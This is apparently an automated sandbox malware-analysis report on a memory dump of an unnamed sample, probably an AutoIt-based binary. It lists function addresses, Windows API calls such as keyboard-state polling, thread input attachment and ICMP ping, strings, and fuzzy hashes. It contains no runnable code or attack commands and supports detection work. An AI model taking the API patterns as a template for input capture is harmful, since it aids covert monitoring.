Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 6391f6be5ffb1f924c4534582b1dcf7eba9e6f19392b8dba4730708a7244abb0
Instruction ID: 25f6b9ffad5b1ccfdb516284e4228fc614ccf54c02232eaf38b0c4b5a7b7ab60
Opcode Fuzzy Hash: 6391f6be5ffb1f924c4534582b1dcf7eba9e6f19392b8dba4730708a7244abb0
Instruction Fuzzy Hash: 57C15471A18301AFD704DF68C88492BBBE9FF89748F10491DF88A9B251D731EE15CB52

Function 00237A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00237AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00237B8F
SHGetDesktopFolder.SHELL32(?), ref: 00237BA3
CoCreateInstance.OLE32(0025FD08,00000000,00000001,00286E6C,?), ref: 00237BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00237C74
CoTaskMemFree.OLE32(?,?), ref: 00237CCC
SHBrowseForFolderW.SHELL32(?), ref: 00237D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00237D7A
CoTaskMemFree.OLE32(00000000), ref: 00237D81
CoTaskMemFree.OLE32(00000000), ref: 00237DD6
CoUninitialize.OLE32 ref: 00237DDC

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: b89dc6a45fad3a6e286a4b3c6c77956d978cddb295aef95d9a47ccf9522d8d0f
Instruction ID: 532dd6a3426f462f1d6682611d2d8aba2cf1e4942c86495e69762ad160b51361
Opcode Fuzzy Hash: b89dc6a45fad3a6e286a4b3c6c77956d978cddb295aef95d9a47ccf9522d8d0f
Instruction Fuzzy Hash: 14C11AB5A14209AFCB14DFA4D888DAEBBF9FF58304F148499E8159B361D730EE45CB90

Function 0025541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00255504
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00255515
CharNextW.USER32(00000158), ref: 00255544
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00255585
SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0025559B
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002555AC

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend$CharNext
String ID:
API String ID: 1350042424-0
Opcode ID: ad26555d9645179b84ca1381200a6a5c749fbf03a588c9dd73b62f12c089bb2d
Instruction ID: 5c206494a9e692ef779894f70b0b6b0b1ebf83ec88ab432ee20f2afb8e958369
Opcode Fuzzy Hash: ad26555d9645179b84ca1381200a6a5c749fbf03a588c9dd73b62f12c089bb2d
Instruction Fuzzy Hash: BB618030920629EFDF108F94DC949FE7BB9FB09722F104145F925A7290D7748AA8DB64

Function 0021FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0021FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0021FB08
VariantInit.OLEAUT32(?), ref: 0021FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0021FB3A
VariantCopy.OLEAUT32(?,?), ref: 0021FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0021FBA1
VariantClear.OLEAUT32(?), ref: 0021FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0021FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0021FBCC
VariantClear.OLEAUT32(?), ref: 0021FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0021FBE9

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 752702f2deda07bae9ef90fed6fd0cdc2274cbc8a54fb1d0dd17bc159e3ca978
Instruction ID: d9793908ee8822295c3b10843eb29955c91a863a62b05d301231888c4f9904e6
Opcode Fuzzy Hash: 752702f2deda07bae9ef90fed6fd0cdc2274cbc8a54fb1d0dd17bc159e3ca978
Instruction Fuzzy Hash: 36419274A103199FCB00DF64D858DEDBBB9FF18345F108029E815A7261D730EA46CF90

Function 00229C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00229CA1
GetAsyncKeyState.USER32(000000A0), ref: 00229D22
GetKeyState.USER32(000000A0), ref: 00229D3D
GetAsyncKeyState.USER32(000000A1), ref: 00229D57
GetKeyState.USER32(000000A1), ref: 00229D6C
GetAsyncKeyState.USER32(00000011), ref: 00229D84
GetKeyState.USER32(00000011), ref: 00229D96
GetAsyncKeyState.USER32(00000012), ref: 00229DAE
GetKeyState.USER32(00000012), ref: 00229DC0
GetAsyncKeyState.USER32(0000005B), ref: 00229DD8
GetKeyState.USER32(0000005B), ref: 00229DEA

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: 22fa1fa5b115a40d2249897be1617103ebdd6bad3cbfdaadbd1312bbc2695b0e
Instruction ID: ff267d67544873e1af99f9ad214468a7b4c886142067d0800e0d9d320812b454
Opcode Fuzzy Hash: 22fa1fa5b115a40d2249897be1617103ebdd6bad3cbfdaadbd1312bbc2695b0e
Instruction Fuzzy Hash: 8C41E6345247DB7DFF309FE4A8043B5BEA0AF15304F44805BDAC6561C2EBA499E8C7A2

Function 0024055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 002405BC
inet_addr.WSOCK32(?), ref: 0024061C
gethostbyname.WSOCK32(?), ref: 00240628
IcmpCreateFile.IPHLPAPI ref: 00240636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002406C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002406E5
IcmpCloseHandle.IPHLPAPI(?), ref: 002407B9
WSACleanup.WSOCK32 ref: 002407BF

Strings

Ping, xrefs: 00240676

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: d170ef2632ae135196527e5fc9e3b89f88186529c69f6e37533e328366889cda
Instruction ID: c0aa1413bac2d4bda63e529af12bf0e8250dee5175c52811f7bb210b4a9b3a32
Opcode Fuzzy Hash: d170ef2632ae135196527e5fc9e3b89f88186529c69f6e37533e328366889cda
Instruction Fuzzy Hash: 21918C356143029FD324DF15D4C8F1ABBE4EF48318F1585A9E56A8B6A2C770ED91CF82

Function 00248CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00248CF3

Part of subcall function 00228E54: _wcslen.LIBCMT ref: 00228E77

_wcslen.LIBCMT ref: 00248D4E
_wcslen.LIBCMT ref: 00248D9C
_wcslen.LIBCMT ref: 00248DDC
_wcslen.LIBCMT ref: 00248E6E

Strings

cdecl, xrefs: 00248D48, 00248D4D
none, xrefs: 00248E65, 00248E6A
winapi, xrefs: 00248D96, 00248D9B
stdcall, xrefs: 00248DD6, 00248DDB

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _wcslen$BuffCharLower
String ID: cdecl$none$stdcall$winapi
API String ID: 707087890-567219261
Opcode ID: d34e7d7cf3198bb4a594c762eb6ecfc20e92cf04dc7105e12e162247da4ce20c
Instruction ID: 6f5876d37c850f9f30a5b47cfda784aed721fdd9e05c030747ff38976175ed5b
Opcode Fuzzy Hash: d34e7d7cf3198bb4a594c762eb6ecfc20e92cf04dc7105e12e162247da4ce20c
Instruction Fuzzy Hash: EE51AF31A315179BCB18EF68C9409BEB7A5BF64724B204229F826E72C4EB30DD60C790

Function 0024372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32 ref: 00243774
CoUninitialize.OLE32 ref: 0024377F
CoCreateInstance.OLE32(?,00000000,00000017,0025FB78,?), ref: 002437D9
IIDFromString.OLE32(?,?), ref: 0024384C
VariantInit.OLEAUT32(?), ref: 002438E4
VariantClear.OLEAUT32(?), ref: 00243936

Strings

Failed to create object, xrefs: 002437E4, 0024389A
Invalid parameter, xrefs: 00243865
NULL Pointer assignment, xrefs: 0024381E

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
API String ID: 636576611-1287834457
Opcode ID: 1edc5194a28083ba8fa88e87c940b4e88abf90463b85e3c6d088947b5b6ebf05
Instruction ID: 508e6f4f974ad45784f9d732b99898680e545a490249b97cc9e493b63722216f
Opcode Fuzzy Hash: 1edc5194a28083ba8fa88e87c940b4e88abf90463b85e3c6d088947b5b6ebf05
Instruction Fuzzy Hash: 8D61ACB0628301AFD314DF54D889F6AFBE8EF49711F100819F8859B291D7B0EE58CB92

Function 00233388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,?), ref: 002333CF

Part of subcall function 001C9CB3: _wcslen.LIBCMT ref: 001C9CBD

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 002333F0

Strings

Incorrect parameters to object property !, xrefs: 002334AB
Line %d (File "%s"):, xrefs: 00233443, 0023345C
"%s" (%d) : ==> %s:%s%s, xrefs: 00233504
Error: , xrefs: 002334D1
"%s" (%d) : ==> %s:, xrefs: 00233522
^ ERROR , xrefs: 0023349E

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-3080491070
Opcode ID: 5c40dd56a4e765b5159a0c8562476f6dd5e2f029bde9d2f54546160ef4c805f9
Instruction ID: eef8969a0ce7866eb4cdd3c251806b18892ca90ac18bf9f99d07a7c08b4ed2ae
Opcode Fuzzy Hash: 5c40dd56a4e765b5159a0c8562476f6dd5e2f029bde9d2f54546160ef4c805f9
Instruction Fuzzy Hash: 4251827191020ABADF15EBE0DD4AEEEB778AF24340F104169F50572092EB31AF68DF65

Function 0022B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 0022B5FC
_wcslen.LIBCMT ref: 0022B608
_wcslen.LIBCMT ref: 0022B64D
_wcslen.LIBCMT ref: 0022B68C
_wcslen.LIBCMT ref: 0022B6C7

Strings

APPEND, xrefs: 0022B6C1, 0022B6C6
REMOVE, xrefs: 0022B602, 0022B607
KEYS, xrefs: 0022B647, 0022B64C
EXISTS, xrefs: 0022B686, 0022B68B

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 1256254125-769500911
Opcode ID: 48db0ca3962f815ebbd2a50096d5dab2d0e5fffb066dcdb95366519069feb4d4
Instruction ID: 5dd68f3553f78a99d962fee669587963aa7c2f907608a95a79e085262d3727c3
Opcode Fuzzy Hash: 48db0ca3962f815ebbd2a50096d5dab2d0e5fffb066dcdb95366519069feb4d4
Instruction Fuzzy Hash: 1741D832A21137ABCB116FFD98905BEB7A9BF70758B244129E461DB284E731CD91C790

Function 00235393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 002353A0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00235416
GetLastError.KERNEL32 ref: 00235420
SetErrorMode.KERNEL32(00000000,READY), ref: 002354A7

Strings

READY, xrefs: 00235460, 00235468
READONLY, xrefs: 00235452
UNKNOWN, xrefs: 00235444
INVALID, xrefs: 00235459
NOTREADY, xrefs: 0023544B

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: 06cdf62beeb2a78267224311072efdc6f08ad86aa82829958c22d43f931d9469
Instruction ID: f0fbd037d78f12eca2494e4f067ec5783a1bd94e5d9e6b2f75aec68965bee191
Opcode Fuzzy Hash: 06cdf62beeb2a78267224311072efdc6f08ad86aa82829958c22d43f931d9469
Instruction Fuzzy Hash: AA31E3B5A206159FC714DF68C488FAABBF4FF14305F148069EA09CB292D770ED92CB90

Function 00253C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00253C79
SetMenu.USER32(?,00000000), ref: 00253C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00253D10
IsMenu.USER32(?), ref: 00253D24
CreatePopupMenu.USER32 ref: 00253D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00253D5B
DrawMenuBar.USER32 ref: 00253D63

Strings

0, xrefs: 00253C54
F, xrefs: 00253D4E

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$F
API String ID: 161812096-3044882817
Opcode ID: f615b3114ee6080b6ce6b2e3093e45621a1d9b0106276f343528161788f766f0
Instruction ID: 31f2643b3bb6f603630496ad10e4331e5d54cc63e5245c9b77f0764bff8310da
Opcode Fuzzy Hash: f615b3114ee6080b6ce6b2e3093e45621a1d9b0106276f343528161788f766f0
Instruction Fuzzy Hash: 94415E75A1130AAFDB14CF94E848B9A77B5FF49351F140029FD46A7360E770AA24CF98

Function 00253A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00253A9D
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00253AA0
GetWindowLongW.USER32(?,000000F0), ref: 00253AC7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00253AEA
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00253B62
SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00253BAC
SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00253BC7
SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00253BE2
SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00253BF6
SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00253C13

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: MessageSend$LongWindow
String ID:
API String ID: 312131281-0
Opcode ID: 94779a473324e093d37c027d2102877dbf38da158c098b8fccd87e7e1f5cf88d
Instruction ID: 7b96b3e1e5cbaf79a9452154924597b34b1ff4caddb5e2a2a7d64aa2a4bd6848
Opcode Fuzzy Hash: 94779a473324e093d37c027d2102877dbf38da158c098b8fccd87e7e1f5cf88d
Instruction Fuzzy Hash: 18618875A00209AFDB11DFA8CC85EEE77B8EB09704F10009AFA15E72A1D770AE65DF54

Function 0022B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0022B151
GetForegroundWindow.USER32(00000000,?,?,?,?,?,0022A1E1,?,00000001), ref: 0022B165
GetWindowThreadProcessId.USER32(00000000), ref: 0022B16C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0022A1E1,?,00000001), ref: 0022B17B
GetWindowThreadProcessId.USER32(?,00000000), ref: 0022B18D
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0022A1E1,?,00000001), ref: 0022B1A6
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0022A1E1,?,00000001), ref: 0022B1B8
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0022A1E1,?,00000001), ref: 0022B1FD
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0022A1E1,?,00000001), ref: 0022B212
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0022A1E1,?,00000001), ref: 0022B21D

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 1ca97732f502a8ec9447f0d335ded952bfd3f602b8154906188fb81c98df65f4
Instruction ID: b4589a8d2aa0897504a2c1a1e2f77a1aa271897df1aa9e38e0e2c8814614d510
Opcode Fuzzy Hash: 1ca97732f502a8ec9447f0d335ded952bfd3f602b8154906188fb81c98df65f4
Instruction Fuzzy Hash: 7E31A971520315FFDB12DFA4FC4CB6E7BA9AB50312F208116FA04D61A0E7B49A60CF64

Function 001F2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 001F2C94

Part of subcall function 001F29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000), ref: 001F29DE
Part of subcall function 001F29C8: GetLastError.KERNEL32(00000000,?,001FD7D1,00000000,00000000,00000000,00000000,?,001FD7F8,00000000,00000007,00000000,?,001FDBF5,00000000,00000000), ref: 001F29F0

_free.LIBCMT ref: 001F2CA0
_free.LIBCMT ref: 001F2CAB
_free.LIBCMT ref: 001F2CB6
_free.LIBCMT ref: 001F2CC1
_free.LIBCMT ref: 001F2CCC
_free.LIBCMT ref: 001F2CD7
_free.LIBCMT ref: 001F2CE2
_free.LIBCMT ref: 001F2CED
_free.LIBCMT ref: 001F2CFB

Memory Dump Source

Source File: 00000000.00000002.1707525489.00000000001C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.1707507005.00000000001C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.000000000025C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707581381.0000000000282000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707624423.000000000028C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707641887.0000000000294000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1c0000_K3xL5Xy0XS.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: e23e8331f6c729daee5c5cba87d99ac40aea44e0865939d30f77dfdef3e6570c
Instruction ID: b2fe26039fe0f897148931f9610684b90839389f733aeabb4f9eebb88fb769cc
Opcode Fuzzy Hash: e23e8331f6c729daee5c5cba87d99ac40aea44e0865939d30f77dfdef3e6570c
Instruction Fuzzy Hash: FF11A27614051DAFCB02EF94D882CED3BA9FF15354F8144A5FA489F222DB71EE509B90

Function 001C1410 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 332comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001C1459
OleUninitialize.OLE32(?,00000000), ref: 001C14F8
UnregisterHotKey.USER32(?), ref: 001C16DD
DestroyWindow.USER32(?), ref: 002024B9
